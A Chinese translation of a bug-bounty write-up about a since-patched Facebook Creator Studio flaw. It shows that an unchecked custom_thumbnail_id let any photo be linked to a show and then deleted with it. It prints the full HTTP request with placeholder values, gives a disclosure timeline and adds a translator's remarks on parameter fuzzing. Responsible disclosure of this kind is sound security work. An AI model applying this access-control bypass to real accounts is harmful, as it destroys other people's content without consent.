原文:
https://lokeshdlk77.medium.com/delete-any-photos-in-facebook-832dbe81cdc4
这篇文章是关于我在facebook上发现的一个任意图片删除的漏洞,利用该漏洞可以删除facebook上的任意照片。
Pouya Darabi 已经发现了照片删除漏洞,这篇是对补丁的绕过。
这个功能可以设置艺术海报(强制)和封面图(可选的)。
当创建一个新的系列的时候,如果攻击者尝试修改艺术海报和封面图片时,服务器会进行验证,并返回一个错误。但是当再次编辑,服务器并没有检查封面图片。所以我们可以将Facebook上的任意图片设置为封面图片。
在将“ custom_thumbnail_id = xxx”值替换为任何照片ID时,它将与其相关联。
POST /media/manager/shows/edit_show_metadata/?show_id=xxx&title=xxx&description=&custom_thumbnail_id=xxx&is_serialized=false&poster_art_id=xxx&session_id=xxx&av=xxx HTTP/1.1
Host: business.facebook.com
Connection: close
Content-Length: 467
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Viewport-Width: 2048
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://business.facebook.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://business.facebook.com/creatorstudio/?tab=content_shows&collection_id=all_pages
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sb=xxx; datr=xxx; dpr=1.25; c_user=xxx;__user=xxx&__a=1&fb_dtsg=xxx
当删除这一个系列的时候,所有的视频,海报,封面图片都会被删掉。
时间线:
2020年10月5日:已发送报告
2020年10月5日:Facebook进行进一步调查和临时修订
2020年10月10日:$ 10000赏金+Facebook提供的$ 750奖金
2020年10月31日:已由Facebook和我确认修补
译者按:
现在漏洞变得越来越隐晦来起来,如果想直接越权删除图片必然是不可能的,作者通过将任意图片关联到自己的账号上。然后再进行删除,成功造成了任意文件删除。现在很直白的漏洞在大一点的厂商基本不存在了,比如一个越权,以前可能直接修改ID就可以越权,现在可能需要你先猜出参数,然后再猜参数类型,然后再去fuzz参数范围,最终造成越权。
本文迁移自知识星球“火线Zone”
